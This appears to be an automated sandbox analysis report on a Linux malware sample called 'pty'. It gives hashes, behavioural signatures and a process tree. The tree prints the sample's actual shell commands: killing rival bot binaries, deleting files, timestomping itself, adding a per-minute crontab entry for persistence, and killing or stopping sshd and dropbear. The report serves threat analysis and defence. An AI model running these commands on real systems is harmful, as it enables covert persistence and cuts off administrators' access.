Analysis
-
max time kernel
0s -
max time network
103s -
platform
linux_amd64 -
resource
ubuntu1804-amd64-en-20211208 -
resource tags
arch:amd64arch:i386image:ubuntu1804-amd64-en-20211208kernel:4.15.0-161-genericlocale:en-usos:ubuntu-18.04-amd64system -
submitted
08-08-2022 11:59
Static task
static1
Behavioral task
behavioral1
Sample
pty
Resource
ubuntu1804-amd64-en-20211208
ubuntu-18.04-amd64
5 signatures
150 seconds
General
-
Target
pty
-
Size
43KB
-
MD5
4828b6dfe2f542f5763109c015a1fc57
-
SHA1
08b0e90b15ef106b1a67273788ab42763b728e0a
-
SHA256
af736d0466d0c88fe66666676ca09462fddedbbe8befe49dd2dc691053c293c6
-
SHA512
242cb978a8dff0857bd83618b68b07834794a67a86a9421fc55934db220254e20395825b089b9be6fda577cee9451d3d9eaa66de2835932591ccd2d681481796
Score
8/10
Malware Config
Signatures
-
Modifies hosts file 1 IoCs
Adds to hosts file used for mapping hosts to IP addresses.
Processes:
sudodescription ioc process /etc/hosts /etc/hosts sudo -
Writes DNS configuration 1 TTPs 1 IoCs
Writes data to DNS resolver config file.
-
Write file to user bin folder 1 TTPs 2 IoCs
Processes:
serviceservicedescription ioc process /usr/sbin/service /usr/sbin/service service /usr/sbin/service /usr/sbin/service service -
Reads runtime system information 64 IoCs
Reads data from /proc virtual filesystem.
Processes:
killallkillallkillallsystemctlkillallkillallkillallsystemctlsystemctlkillallkillallkillallsystemctlkillallsystemctlsystemctlsystemctlsystemctldescription ioc process /proc/347/cmdline /proc/347/cmdline killall /proc/599/stat /proc/599/stat killall /proc/339/stat /proc/339/stat killall /proc/cmdline /proc/cmdline systemctl /proc/17/stat /proc/17/stat killall /proc/286/cmdline /proc/286/cmdline killall /proc/78/stat /proc/78/stat killall /proc/578/stat /proc/578/stat killall /proc/193/stat /proc/193/stat killall /proc/251/stat /proc/251/stat killall /proc/1/sched /proc/1/sched systemctl /proc/cmdline /proc/cmdline systemctl /proc/28/stat /proc/28/stat killall /proc/31/stat /proc/31/stat killall /proc/34/stat /proc/34/stat killall /proc/27/stat /proc/27/stat killall /proc/169/stat /proc/169/stat killall /proc/83/stat /proc/83/stat killall /proc/356/stat /proc/356/stat killall /proc/161/stat /proc/161/stat killall /proc/223/stat /proc/223/stat killall /proc/32/stat /proc/32/stat killall /proc/1/sched /proc/1/sched systemctl /proc/192/stat /proc/192/stat killall /proc/333/stat /proc/333/stat killall /proc/22/stat /proc/22/stat killall /proc/155/stat /proc/155/stat killall /proc/161/stat /proc/161/stat killall /proc/420/stat /proc/420/stat killall /proc/1/environ /proc/1/environ systemctl /proc/sys/kernel/osrelease /proc/sys/kernel/osrelease systemctl /proc/28/stat /proc/28/stat killall /proc/153/stat /proc/153/stat killall /proc/1/stat /proc/1/stat killall /proc/16/stat /proc/16/stat killall /proc/352/stat /proc/352/stat killall /proc/418/stat /proc/418/stat killall /proc/filesystems /proc/filesystems systemctl /proc/164/stat /proc/164/stat killall /proc/85/stat /proc/85/stat killall /proc/8/stat /proc/8/stat killall /proc/1/environ /proc/1/environ systemctl /proc/17/stat /proc/17/stat killall /proc/286/stat /proc/286/stat killall /proc/8/stat /proc/8/stat killall /proc/575/stat /proc/575/stat killall /proc/36/stat /proc/36/stat killall /proc/341/stat /proc/341/stat killall /proc/347/cmdline /proc/347/cmdline killall /proc/223/stat /proc/223/stat killall /proc/356/stat /proc/356/stat killall /proc/193/cmdline /proc/193/cmdline killall /proc/1/environ /proc/1/environ systemctl /proc/1/sched /proc/1/sched systemctl /proc/14/stat /proc/14/stat killall /proc/169/stat /proc/169/stat killall /proc/169/stat /proc/169/stat killall /proc/159/stat /proc/159/stat killall /proc/4/stat /proc/4/stat killall /proc/15/stat /proc/15/stat killall /proc/3/stat /proc/3/stat killall /proc/159/stat /proc/159/stat killall /proc/81/stat /proc/81/stat killall /proc/25/stat /proc/25/stat killall -
Writes file to tmp directory 3 IoCs
Malware often drops required files in the /tmp directory.
Processes:
catrmdescription ioc /tmp/.xs /tmp/.xs /tmp/.xs/*.pid /tmp/.xs/*.pid cat /tmp/.xs/* /tmp/.xs/* rm
Processes
-
/tmp/pty/tmp/pty1⤵
-
/bin/shsh -c "rm -rf /var/run/wgsh > /dev/null 2>&1 &"1⤵
-
/bin/rmrm -rf /var/run/wgsh2⤵
-
/bin/shsh -c "rm -rf /var/run/bbsh > /dev/null 2>&1 &"1⤵
-
/bin/rmrm -rf /var/run/bbsh2⤵
-
/bin/shsh -c "rm -rf /var/run/pty > /dev/null 2>&1 &"1⤵
-
/bin/rmrm -rf /var/run/pty2⤵
-
/bin/shsh -c "killall -9 arm > /dev/null 2>&1 &"1⤵
-
/usr/bin/killallkillall -9 arm2⤵
- Reads runtime system information
-
/bin/shsh -c "killall -9 mips > /dev/null 2>&1 &"1⤵
-
/usr/bin/killallkillall -9 mips2⤵
- Reads runtime system information
-
/bin/shsh -c "killall -9 mipsel > /dev/null 2>&1 &"1⤵
-
/usr/bin/killallkillall -9 mipsel2⤵
- Reads runtime system information
-
/bin/shsh -c "killall -9 powerpc > /dev/null 2>&1 &"1⤵
-
/usr/bin/killallkillall -9 powerpc2⤵
- Reads runtime system information
-
/bin/shsh -c "killall -9 ppc > /dev/null 2>&1 &"1⤵
-
/usr/bin/killallkillall -9 ppc2⤵
- Reads runtime system information
-
/bin/shsh -c "killall -9 daemon.armv4l.mod > /dev/null 2>&1 &"1⤵
-
/usr/bin/killallkillall -9 daemon.armv4l.mod2⤵
- Reads runtime system information
-
/bin/shsh -c "killall -9 daemon.i686.mod > /dev/null 2>&1 &"1⤵
-
/usr/bin/killallkillall -9 daemon.i686.mod2⤵
- Reads runtime system information
-
/bin/shsh -c "killall -9 daemon.mips.mod > /dev/null 2>&1 &"1⤵
-
/usr/bin/killallkillall -9 daemon.mips.mod2⤵
- Reads runtime system information
-
/bin/shsh -c "killall -9 daemon.mipsel.mod > /dev/null 2>&1 &"1⤵
-
/usr/bin/killallkillall -9 daemon.mipsel.mod2⤵
- Reads runtime system information
-
/bin/shsh -c "kill -9 `cat /tmp/.xs/*.pid` > /dev/null 2>&1 &"1⤵
-
/bin/shsh -c "rm -rf /tmp/.xs/* > /dev/null 2>&1 &"1⤵
-
/bin/rmrm -rf "/tmp/.xs/*"2⤵
- Writes file to tmp directory
-
/bin/catcat "/tmp/.xs/*.pid"1⤵
- Writes file to tmp directory
-
/bin/shsh -c "touch -acmr /bin/ls /tmp/pty"1⤵
-
/usr/bin/touchtouch -acmr /bin/ls /tmp/pty2⤵
-
/bin/shsh -c "(crontab -l | grep -v \"/tmp/pty\" | grep -v \"no cron\" | grep -v \"lesshts/run.sh\" > /var/run/.x001804289383) > /dev/null 2>&1"1⤵
-
/bin/grepgrep -v /tmp/pty1⤵
-
/usr/bin/crontabcrontab -l1⤵
-
/bin/grepgrep -v "no cron"1⤵
-
/bin/grepgrep -v lesshts/run.sh1⤵
-
/bin/shsh -c "echo \"* * * * * /tmp/pty > /dev/null 2>&1 &\" >> /var/run/.x001804289383"1⤵
-
/bin/shsh -c "crontab /var/run/.x001804289383"1⤵
-
/usr/bin/crontabcrontab /var/run/.x0018042893832⤵
-
/bin/shsh -c "rm -rf /var/run/.x001804289383"1⤵
-
/bin/rmrm -rf /var/run/.x0018042893832⤵
-
/bin/shsh -c "/bin/uname -n"1⤵
-
/bin/uname/bin/uname -n2⤵
-
/bin/shsh -c "/bin/uname -n"1⤵
-
/bin/uname/bin/uname -n2⤵
-
/bin/shsh -c "export PATH=/bin:/sbin:/usr/bin:/usr/local/bin:/usr/sbin;( kill -9 `cat /var/run/dropbear.pid` `cat /var/run/sshd.pid` ; service sshd stop ; sudo service sshd stop ; killall -9 sshd dropbear ; kill -9 `pidof sshd` `pidof dropbear` )>/dev/null 2>&1 & "1⤵
-
/bin/catcat /var/run/dropbear.pid1⤵
-
/bin/catcat /var/run/sshd.pid1⤵
-
/usr/sbin/serviceservice sshd stop1⤵
- Write file to user bin folder
-
/usr/bin/basenamebasename /usr/sbin/service2⤵
-
/usr/bin/basenamebasename /usr/sbin/service2⤵
-
/bin/systemctlsystemctl --quiet is-active multi-user.target2⤵
-
/bin/systemctlsystemctl -p Triggers show dbus.socket2⤵
-
/bin/systemctlsystemctl -p Triggers show ssh.socket2⤵
-
/bin/systemctlsystemctl -p Triggers show syslog.socket2⤵
- Reads runtime system information
-
/bin/systemctlsystemctl -p Triggers show systemd-fsckd.socket2⤵
-
/bin/systemctlsystemctl -p Triggers show systemd-initctl.socket2⤵
-
/bin/systemctlsystemctl -p Triggers show systemd-journald-audit.socket2⤵
-
/bin/systemctlsystemctl -p Triggers show systemd-journald-dev-log.socket2⤵
-
/bin/systemctlsystemctl -p Triggers show systemd-journald.socket2⤵
-
/bin/systemctlsystemctl -p Triggers show systemd-networkd.socket2⤵
-
/bin/systemctlsystemctl -p Triggers show systemd-rfkill.socket2⤵
-
/bin/systemctlsystemctl -p Triggers show systemd-udevd-control.socket2⤵
-
/bin/systemctlsystemctl -p Triggers show systemd-udevd-kernel.socket2⤵
-
/bin/systemctlsystemctl -p Triggers show uuidd.socket2⤵
- Reads runtime system information
-
/bin/systemctlsystemctl list-unit-files --full "--type=socket"1⤵
-
/bin/sedsed -ne "s/\\.socket\\s*[a-z]*\\s*\$/.socket/p"1⤵
-
/bin/systemctlsystemctl stop sshd.service1⤵
- Reads runtime system information
-
/usr/bin/sudosudo service sshd stop1⤵
- Modifies hosts file
- Writes DNS configuration
-
/usr/sbin/serviceservice sshd stop2⤵
- Write file to user bin folder
-
/usr/bin/basenamebasename /usr/sbin/service3⤵
-
/usr/bin/basenamebasename /usr/sbin/service3⤵
-
/bin/systemctlsystemctl --quiet is-active multi-user.target3⤵
- Reads runtime system information
-
/bin/systemctlsystemctl -p Triggers show dbus.socket3⤵
-
/bin/systemctlsystemctl -p Triggers show ssh.socket3⤵
-
/bin/systemctlsystemctl -p Triggers show syslog.socket3⤵
-
/bin/systemctlsystemctl -p Triggers show systemd-fsckd.socket3⤵
-
/bin/systemctlsystemctl -p Triggers show systemd-initctl.socket3⤵
-
/bin/systemctlsystemctl -p Triggers show systemd-journald-audit.socket3⤵
- Reads runtime system information
-
/bin/systemctlsystemctl -p Triggers show systemd-journald-dev-log.socket3⤵
-
/bin/systemctlsystemctl -p Triggers show systemd-journald.socket3⤵
- Reads runtime system information
-
/bin/systemctlsystemctl -p Triggers show systemd-networkd.socket3⤵
-
/bin/systemctlsystemctl -p Triggers show systemd-rfkill.socket3⤵
- Reads runtime system information
-
/bin/systemctlsystemctl -p Triggers show systemd-udevd-control.socket3⤵
-
/bin/systemctlsystemctl -p Triggers show systemd-udevd-kernel.socket3⤵
-
/bin/systemctlsystemctl -p Triggers show uuidd.socket3⤵
-
/usr/local/sbin/systemctlsystemctl stop sshd.service2⤵
-
/usr/local/bin/systemctlsystemctl stop sshd.service2⤵
-
/usr/sbin/systemctlsystemctl stop sshd.service2⤵
-
/usr/bin/systemctlsystemctl stop sshd.service2⤵
-
/sbin/systemctlsystemctl stop sshd.service2⤵
-
/bin/systemctlsystemctl stop sshd.service2⤵
- Reads runtime system information
-
/bin/systemctlsystemctl list-unit-files --full "--type=socket"1⤵
-
/bin/sedsed -ne "s/\\.socket\\s*[a-z]*\\s*\$/.socket/p"1⤵
-
/usr/bin/killallkillall -9 sshd dropbear1⤵
- Reads runtime system information
-
/bin/pidofpidof sshd1⤵
-
/bin/pidofpidof dropbear1⤵